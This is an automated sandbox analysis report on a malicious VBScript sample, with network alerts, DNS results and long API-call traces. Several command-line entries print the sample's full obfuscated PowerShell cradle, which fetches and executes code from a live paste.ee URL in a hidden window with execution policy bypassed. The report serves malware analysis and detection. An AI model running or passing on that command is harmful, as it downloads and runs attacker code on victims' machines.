popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

kiss.txt.vbs

Generic Malware Antivirus PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 July 29, 2024, 4:48 p.m. July 29, 2024, 4:51 p.m.
Size 8.3KB
Type ASCII text, with CRLF line terminators
MD5 e18a46ead29fa590d71256bca05fac76
SHA256 ddbf59d3594585e8755774c634fc88e318e1590bfdd9094b804fdacb91173ee7
CRC32 85A9EE11
ssdeep 192:GiFSTRuYgmY9CfjdUxdNGwpw3xb4FK+F8S7jXsaBZPk+oyRcaMu+JNeit7umGM8B:Z8bnK
Yara
  • Antivirus - Contains references to security software

Name Response Post-Analysis Lookup
paste.ee
A 104.21.84.67
A 172.67.187.200
172.67.187.200
IP Address Status Action
104.21.84.67 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.102:63709 -> 164.124.101.2:53 2054041 ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee) Misc activity
TCP 192.168.56.102:49164 -> 104.21.84.67:443 2034978 ET POLICY Pastebin-style Service (paste .ee) in TLS SNI Potential Corporate Privacy Violation
TCP 192.168.56.102:49164 -> 104.21.84.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49164
104.21.84.67:443 		C=US, O=Google Trust Services, CN=WE1 CN=paste.ee db:ac:96:3c:aa:07:4d:6f:90:48:a6:34:79:1d:71:cf:4d:ef:d9:c2

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: IsPublic IsSerial Name BaseType
console_handle: 0x0000001b
1 1 0

WriteConsoleW

 buffer: True True Byte[] System.Array
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: True True Byte[] System.Array
console_handle: 0x00000027
1 1 0

WriteConsoleW

 buffer: True True Byte[] System.Array
console_handle: 0x0000002b
1 1 0

WriteConsoleW

 buffer: Invoke-Expression : The '<' operator is reserved for future use.
console_handle: 0x0000003f
1 1 0

WriteConsoleW

 buffer: At line:1 char:4
console_handle: 0x0000004b
1 1 0

WriteConsoleW

 buffer: + IeX <<<< (NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING('https://paste.ee/d/9gCcH/
console_handle: 0x00000057
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ParserError: (<:OperatorToken) [Invoke-Expressio
console_handle: 0x0000006f
1 1 0

WriteConsoleW

 buffer: n], ParseException
console_handle: 0x0000007b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : RedirectionNotSupported,Microsoft.PowerShell.Com
console_handle: 0x00000087
1 1 0

WriteConsoleW

 buffer: mands.InvokeExpressionCommand
console_handle: 0x00000093
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cbad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004caf10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004caf10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004caf10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb5d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb050
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cb050
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x06129900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x06129900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x06129900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x06129900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x06129900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x06129900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://paste.ee/d/9gCcH/0
request GET https://paste.ee/d/9gCcH/0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 851968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02620000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x722d1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01eaa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x722d2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ea2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ff2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0262a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ff3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ff4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02637000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01eab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02622000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02635000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ff5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0262c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ff6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02623000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02624000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02625000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02626000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02627000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02628000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02629000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a83000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a84000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a85000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a86000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a87000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a88000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a89000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a91000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a93000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a94000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/9gCcH/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/9gCcH/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/9gCcH/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: Cmd.exe
parameters: /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/9gCcH/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
filepath: Cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received Wf§Iq%/? Ìdé/ÙF@ê7ÝV:ÝmDOWNGRD Æ!x ‚˜e–Ùkè‚ð)‡~åIü/ßBÀ ´²ËěÚÀ ÿ 
Data received  Ò
Data received Î Ë¡0‚0‚B ­ú«>Þ9ÙdïÖ.¬0 *†HÎ=0;1 0 UUS10U Google Trust Services1 0 UWE10 240622144918Z 240920144917Z010Upaste.ee0Y0*†HÎ=*†HÎ=BA>Ó-z V/¥\ˆô]Oàê Ðé¡÷!f žÄr œq%þ.Mç7bíþKîç°¸—µíÁÂzÑÐ|O] ?’£‚M0‚I0Uÿ€0U% 0 +0 Uÿ00UBz~‹<"ñã6¸ri¸N bW{‰0U#0€w’5gÄÿ¨Ì©æ{ـy{̓ù80^+R0P0'+0†http://o.pki.goog/s/we1/rfo0%+0†http://i.pki.goog/we1.crt0U0‚paste.ee‚ *.paste.ee0U  0 0g 06U/0-0+ ) '†%http://c.pki.goog/we1/t4Y_tS4oQ9A.crl0‚ +ÖyõòðußáV몯µœ†q¨À2N®VÙn§õ¥jÑÁ;¾R\@£BÏF0D ;2Áj³,ÛÊŽø‡Œ¢<U×+vªÇëÑäÇÝ1“r¤%¤ "8} ԓ\åIC¼‚PW:Äo‡˜¤Ñ×ì㕓™æwvÿˆ? ¶û•QÂaÌõ‡º4´¤Í»)ÜhB ŸægLZ:t@£B3H0F!çSaÔ))˜,}8 b?7î›k&æ›õј‚õ÷!†œ‘þµ¦1 ¨¾ yÞ²*ªZxŸ¦‹$h–]ÞvG0 *†HÎ=I0F!ÄsHv¬N–À°ú@àOœž•/Ø\ÜÜÞstÝí…V!àMv$” å,´X¡‰šP›·ÐïÿB±õ0ôj‹eK£0‚Ÿ0‚% ów—,"Jv]¶Ö…ã0 *†HÎ=0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R40 231213090000Z 290220140000Z0;1 0 UUS10U Google Trust Services1 0 UWE10Y0*†HÎ=*†HÎ=BoÍ:þgWGL!…@ÂG]»XG@Á\…Æ7çÕ|í†K›Ù×¥ ø˜ÄÆèžÿY,&˜õæ&%»úV£þ0û0Uÿ†0U%0++0Uÿ0ÿ0Uw’5gÄÿ¨Ì©æ{ـy{̓ù80U#0€€LÖëtÿI6£ÕØüµ>Åjð”Œ04+(0&0$+0†http://i.pki.goog/r4.crt0+U$0"0   †http://c.pki.goog/r/r4.crl0U  0 0g 0 *†HÎ=h0e1ç«QÖ÷C•ÎuþÑ”ÕÌ@Az&¾Ø ó2-=®#HR>dy¯õ¦,nU±0&‰Ìhb牫~èÖD~ãLI¿l€b4¸²¡~:ˆP¼§ˆ Ÿ}sìRAMîâV~0‚z0‚b å0¿3C¾Ý‚I=Š0  *†H†÷  0W1 0 